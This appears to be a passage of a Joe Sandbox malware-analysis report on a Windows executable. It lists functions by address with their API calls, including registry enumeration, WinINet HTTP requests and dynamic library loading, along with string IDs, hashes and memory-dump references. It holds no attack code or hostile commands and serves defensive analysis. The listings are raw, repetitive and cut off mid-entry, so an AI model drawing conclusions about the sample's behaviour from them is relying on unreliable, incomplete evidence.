                                                                                                                        • Opcode ID: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                                                                                                                        • Instruction ID: 8c8acb72a5c46b0552f1ce7978438cb854941860c222e3bc7956df5719d2c60f
                                                                                                                        • Opcode Fuzzy Hash: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                                                                                                                        • Instruction Fuzzy Hash: 7C41DD306043829FD724EF25DC80B1ABBE8AF85320F14461EFAA197291E774E904DB92
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFDAD9
                                                                                                                          • Part of subcall function 00F879AB: _memmove.LIBCMT ref: 00F879F9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharLower_memmove
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 3425801089-567219261
                                                                                                                        • Opcode ID: 0bc4a12930e5a8f5589ce6c37df74c1734a551777b8ef23e95bcad8b4c85e870
                                                                                                                        • Instruction ID: 0b94b82777c695da5376d7ba8bd58589b7f21ed53ce66b2d9c911fb3f5eddd92
                                                                                                                        • Opcode Fuzzy Hash: 0bc4a12930e5a8f5589ce6c37df74c1734a551777b8ef23e95bcad8b4c85e870
                                                                                                                        • Instruction Fuzzy Hash: 2231D27190061AAFCF10EF54CC819FEB3B5FF45724B108619E965976A1CB35E906DB80
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FD93F6
                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FD9409
                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FD9439
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 365058703-1403004172
                                                                                                                        • Opcode ID: 10a772183fdaf3662315b6627364d49508075ce8b478cf2dc5943a8b99a41405
                                                                                                                        • Instruction ID: 55f469bb5fffff0d4b4c58354b1dcf4102c0052876c479d6bed7027098139de1
                                                                                                                        • Opcode Fuzzy Hash: 10a772183fdaf3662315b6627364d49508075ce8b478cf2dc5943a8b99a41405
                                                                                                                        • Instruction Fuzzy Hash: 5B210471904204ABDB24ABB1CC859FFB76DDF06760F14821AF921972E1DB79490AB720
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FBD5EC
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        • _memset.LIBCMT ref: 00F8418D
                                                                                                                        • _wcscpy.LIBCMT ref: 00F841E1
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                        • Opcode ID: 3cd3f49675ea5f11f8cc23aae1755671ebdc2f69b6d2c0f93d507374a057abbd
                                                                                                                        • Instruction ID: 228e65bc91399320dee72f58adda56f97e5d06f5158a1fe9963ee35bcea9a000
                                                                                                                        • Opcode Fuzzy Hash: 3cd3f49675ea5f11f8cc23aae1755671ebdc2f69b6d2c0f93d507374a057abbd
                                                                                                                        • Instruction Fuzzy Hash: B531C1B1508705ABD731FB60DD86BDB77E8AF45310F10451EB1C493091EF79A648EB92
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1B40
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF1B66
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FF1B96
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00FF1BDD
                                                                                                                          • Part of subcall function 00FF2777: GetLastError.KERNEL32(?,?,00FF1B0B,00000000,00000000,00000001), ref: 00FF278C
                                                                                                                          • Part of subcall function 00FF2777: SetEvent.KERNEL32(?,?,00FF1B0B,00000000,00000000,00000001), ref: 00FF27A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                        • Opcode ID: b79d2a7948450f6b33badfdec31b67edd9c82ea4ef8605c2ecb493a544b3490c
                                                                                                                        • Instruction ID: 4422b811a28995f99577a689d1383f8673552078ca9bca9c35d835307c24ca88
                                                                                                                        • Opcode Fuzzy Hash: b79d2a7948450f6b33badfdec31b67edd9c82ea4ef8605c2ecb493a544b3490c
                                                                                                                        • Instruction Fuzzy Hash: 5D21CFB290020CFFEB229F208C85EBF77ECFF89754F10011AF645E2250EA259D05A762
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                                                                                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                                                                                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 010066D0
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 010066D7
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010066EC
                                                                                                                        • DestroyWindow.USER32(?), ref: 010066F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                        • Opcode ID: b0388f04517300f3a19c4a481601a4b808a954518dd9f01c6a8155f4234ee6b5
                                                                                                                        • Instruction ID: d339005319e25b8b277c56cb6535e7bc05ba1ab966bbad2c0c47a62face1ce27
                                                                                                                        • Opcode Fuzzy Hash: b0388f04517300f3a19c4a481601a4b808a954518dd9f01c6a8155f4234ee6b5
                                                                                                                        • Instruction Fuzzy Hash: 2A218E71100206AFFF224F68EC80EAB77EEFB49368F104629FA95961D1D77398619760
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE705E
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE7091
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE70A3
                                                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FE70DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                        • Opcode ID: d56734935a6ce1e791a6bb272a7a10209cca99ad2a5d5d39a08ca25c684c64e9
                                                                                                                        • Instruction ID: 16082d9661327aaa712f9adb4135a786eb6c232d2d28277bcaca11fe18d08282
                                                                                                                        • Opcode Fuzzy Hash: d56734935a6ce1e791a6bb272a7a10209cca99ad2a5d5d39a08ca25c684c64e9
                                                                                                                        • Instruction Fuzzy Hash: 3E21817590434AABDB30AF3ADC05A9A77A8AF54730F204619FEA1D72D0E7719940AB50
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE712B
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE715D
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE716E
                                                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FE71A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                        • Opcode ID: f2e22b85d3680170441a03ffb57f9d9cffe1a902680109e92350729aeb4d488b
                                                                                                                        • Instruction ID: f878b27c06db3f02d3e17d5b8b1389be2e19df46315cd0c8853ceac70e965ba7
                                                                                                                        • Opcode Fuzzy Hash: f2e22b85d3680170441a03ffb57f9d9cffe1a902680109e92350729aeb4d488b
                                                                                                                        • Instruction Fuzzy Hash: 5E21C875904386ABDB30AF6A9C04A9AB7E8AF55730F200619FCF0D72D0D7749841E750
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00FEAEBF
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FEAF13
                                                                                                                        • __swprintf.LIBCMT ref: 00FEAF2C
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0100F910), ref: 00FEAF6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                        • Opcode ID: e92debb196e44c29324463976af919bcf0b9765308f01cefe376711e2df5d44c
                                                                                                                        • Instruction ID: 418e0e793a43d93057752411387e68189fa3235c1b8f7eee7823419774daf7e1
                                                                                                                        • Opcode Fuzzy Hash: e92debb196e44c29324463976af919bcf0b9765308f01cefe376711e2df5d44c
                                                                                                                        • Instruction Fuzzy Hash: E7218331A00149AFCB20EF65CC85DEE7BB8EF89704B044069F949EB251DB75EA41EB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                          • Part of subcall function 00FDA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA399
                                                                                                                          • Part of subcall function 00FDA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA3AC
                                                                                                                          • Part of subcall function 00FDA37C: GetCurrentThreadId.KERNEL32 ref: 00FDA3B3
                                                                                                                          • Part of subcall function 00FDA37C: AttachThreadInput.USER32(00000000), ref: 00FDA3BA
                                                                                                                        • GetFocus.USER32 ref: 00FDA554
                                                                                                                          • Part of subcall function 00FDA3C5: GetParent.USER32(?), ref: 00FDA3D3
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDA59D
                                                                                                                        • EnumChildWindows.USER32(?,00FDA615), ref: 00FDA5C5
                                                                                                                        • __swprintf.LIBCMT ref: 00FDA5DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                        • Opcode ID: 5b8ec63d4c019d537561bbbbd527018f40a072b8ed60044371d512208fb8f944
                                                                                                                        • Instruction ID: 79bda910d2b9e44d3d76c39db8fcb1eb6e391f44d202e4ddfe883c72ddd35316
                                                                                                                        • Opcode Fuzzy Hash: 5b8ec63d4c019d537561bbbbd527018f40a072b8ed60044371d512208fb8f944
                                                                                                                        • Instruction Fuzzy Hash: 2011B771600305BBDF217F74DC85FEA377EAF48710F084066B9489A242CA799945BB79
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00FE2048
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                        • API String ID: 3964851224-769500911
                                                                                                                        • Opcode ID: 65f7044bc0ed2020147c1debcf4a4fe0ce467e35384208636bff2849fdf91a95
                                                                                                                        • Instruction ID: 0e6170535a076a35177ef9959355bd614eb30575a6870cd6ab4c9a620eaf472d
                                                                                                                        • Opcode Fuzzy Hash: 65f7044bc0ed2020147c1debcf4a4fe0ce467e35384208636bff2849fdf91a95
                                                                                                                        • Instruction Fuzzy Hash: 05116D7190010ACFCF50EFA4DC815FEB7B8FF5A304B108458D995A72A2EB32A906EB50
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FFEF1B
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FFEF4B
                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FFF07E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FFF0FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2364364464-0
                                                                                                                        • Opcode ID: e9d2dd6d4526e7a04297a74c5eac674581b0e7c317b68193ffe106c4ab12957e
                                                                                                                        • Instruction ID: 81ba0084a5e30efd89ef75a5cfa1fdcb73f852cce4624956de3cbf81211980d7
                                                                                                                        • Opcode Fuzzy Hash: e9d2dd6d4526e7a04297a74c5eac674581b0e7c317b68193ffe106c4ab12957e
                                                                                                                        • Instruction Fuzzy Hash: C28171716043019FD720EF24CC86F6AB7E5AF48720F04881DF69ADB392DBB5AC059B51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 010010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01000038,?,?), ref: 010010BC
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000388
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010003C7
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0100040E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0100043A
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01000447
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3440857362-0
                                                                                                                        • Opcode ID: 5fb9188811f6618ec2e13c807f18277873ed5a47635697475f2c9e57f93472dc
                                                                                                                        • Instruction ID: b279e6a3afccdb0ebb14797ca6e126c030284fbd4793fdd0746ebc808372618a
                                                                                                                        • Opcode Fuzzy Hash: 5fb9188811f6618ec2e13c807f18277873ed5a47635697475f2c9e57f93472dc
                                                                                                                        • Instruction Fuzzy Hash: B6516771208201AFE715EB68CC81FAEB7E8FF88704F04891EB59587291DB39E905DB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDC3B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDCBE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FFDCDA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDD1B
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDD35
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7B20,?,?,00000000), ref: 00F85B8C
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7B20,?,?,00000000,?,?), ref: 00F85BB0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327935632-0
                                                                                                                        • Opcode ID: feebeb3909414f1461eeeaef2983b197d7831fcdeb0def2b0fca05b5be0b8b15
                                                                                                                        • Instruction ID: ad37509fa9fcf4233a46399cdbba16e0e9777c3321e31295c32f1568d1ada952
                                                                                                                        • Opcode Fuzzy Hash: feebeb3909414f1461eeeaef2983b197d7831fcdeb0def2b0fca05b5be0b8b15
                                                                                                                        • Instruction Fuzzy Hash: 2F514935A002099FCB10EF68C8849EDB7F5FF59720B088059E915AB321DB79ED45EF91
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FEE88A
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FEE8B3
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FEE8F2
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FEE917
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FEE91F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
